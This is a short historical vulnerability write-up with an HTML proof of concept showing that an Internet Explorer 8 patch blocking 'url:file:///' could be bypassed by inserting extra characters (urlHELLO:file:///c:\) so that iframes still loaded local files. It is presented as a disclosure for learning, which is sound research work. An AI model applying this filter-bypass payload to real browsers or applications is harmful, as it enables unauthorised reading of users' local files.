After the url:file:/// trick was patched in an earlier fix, I tried some simple variations to see whether the fix was complete. It turned out that inserting any extra characters between url and the colon — for example urlHELLO:file:/// — bypassed the patch entirely and still loaded the local file.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>WOOBR 1032522 Variation</title></head>
<body>
<font face="Arial" size="2">
<b>url:file:///</b> was patched and as we can see, it is not working:
<br />
<iframe src="url:file:///c:\"></iframe>
<br /><br />
However, if we add any character after the url string, it will still work:
<br />
url<b>HELLO</b>:file:///c:\<br />
<iframe src="urlHELLO:file:///c:\"></iframe>
<br /><br />
Tested on XP/IE 8.0.6001.18226
</font>
</body>
</html>

The patch had blocked the exact string url: but left any variant with extra characters unblocked. This is a common pattern with string-matching fixes — they close the specific reported case but miss the surrounding input space. Tested on XP with IE 8.0.6001.18226.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.